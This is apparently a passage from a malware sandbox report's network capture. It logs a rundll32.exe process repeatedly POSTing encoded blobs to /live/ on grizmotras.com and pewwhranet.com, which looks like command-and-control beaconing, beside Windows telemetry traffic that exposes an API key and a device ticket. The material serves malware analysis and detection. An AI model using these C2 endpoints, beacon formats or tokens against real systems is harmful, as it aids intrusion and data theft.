2024-04-26 21:21:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:24 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge02fnpLUuTBzuoT6jLaQ54P%2BXuKTtRIRGA9fspiL60HrHDKJIY8lvK%2FL921ZEOCjcKpd7TRsIcTVKj1ymHMQkZEvUmV0ANwpJfDy9EJSpcvXNvh3d%2FGJ62PF4nQLI%2FEhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99f393eb1875c-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:24 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49797	20.189.173.10	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:24 UTC	828	OUT	POST /OneCollector/1.0/ HTTP/1.1 Accept: / APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521 AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p= Client-Id: NO_AUTH Content-Encoding: deflate Content-Type: application/bond-compact-binary Expect: 100-continue SDK-Version: EVT-Windows-C++-No-3.4.15.1 Upload-Time: 1714166482925 Host: self.events.data.microsoft.com Content-Length: 7981 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 21:21:24 UTC	7981	OUT	Data Raw: ed 7c 5b ac 5c d7 79 de a6 a4 a8 d4 11 45 d1 92 2c 4b b2 62 31 84 ec 5a d1 cc e9 ba 5f 06 0d 62 ea 90 b6 e8 8a a6 ca 43 49 b6 81 80 dd 33 b3 67 66 93 33 b3 8f e6 c2 8b 90 07 c1 0f 01 52 d4 41 69 a0 40 d1 27 a3 40 0b 0b 48 82 a0 4d 1f 1a f4 21 40 f3 10 87 79 29 fa 98 3e b4 05 fa 52 14 45 50 b4 7d 69 51 f4 5b 6b af bd f7 9a c5 23 da 31 0c 21 06 78 40 f2 f0 5f 6b ed 75 fd ff ef ff fe b5 d6 de 6f 3c ce f7 c9 25 71 65 32 29 47 c5 f5 c3 bb eb 4d b1 08 bf de 2e f2 f9 66 76 b9 d8 e4 e3 7c 93 5f 28 6e a1 c4 41 b5 5c 57 f3 12 09 c5 f8 c3 1f fd 9b 7f f6 ff fe ed f7 ff e5 7f f8 dc 27 e7 aa c1 68 6c b8 52 4c 29 4a 47 62 94 e7 b9 99 8c e4 90 15 9a 99 a2 30 74 fc ef 9e fc de 13 f7 3f bf 77 a2 3c f5 fe e5 db f9 aa e8 9d bd b4 1c ed ff f6 5e 2d 31 d2 a3 d9 fd 17 f7 4e 64 Data Ascii: \|[\yE,Kb1Z_bCI3gf3RAi@'@HM!@y)>REP}iQ[k#1!x@_kuo<%qe2)GM.fv\|_(nA\W'hlRL)JGb0t?w<^-1Nd
2024-04-26 21:21:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-26 21:21:24 UTC	443	IN	HTTP/1.1 200 OK Content-Length: 9 Content-Type: application/json Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 time-delta-millis: 1663 Access-Control-Allow-Headers: time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * Access-Control-Expose-Headers: time-delta-millis Date: Fri, 26 Apr 2024 21:21:23 GMT Connection: close {"acc":4}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49798	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:25 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:25 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:30 UTC	582	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QC4xkyd6IuegBRmcU7rio2UWPlJhFkg7TGgc5QTHPTlIuze6gbnH%2BNSNyi9Jgmi%2FLBunyxzB8odfwgH6NDI8P5QLBAIK2G%2FlvP7b2cMhLFnpC%2BySno%2BHIhNV%2FsbYe8veQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99f557b14b3dd-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:30 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49799	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:31 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:31 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49800	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:35 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:35 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49801	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:40 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:40 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:43 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SX9Qt1EjZDIPvsudlbELZkcjFeHkYncUl2KmF1048Kx18Lf7AEJXOzTk7ESCxh%2FkBWFbtB%2BP7uI78UHqFBdOR7l1yXn6m%2FDhQx8Q2PsY9lWStr76WGNGlMZg0kOMHj%2FVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99fb2bd96a587-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:43 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49802	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:43 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:43 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49803	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:48 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:48 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49804	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:52 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:52 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49805	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:54 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:54 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49806	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:56 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:56 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49807	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:59 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:59 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49808	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:03 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:03 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49809	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:07 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
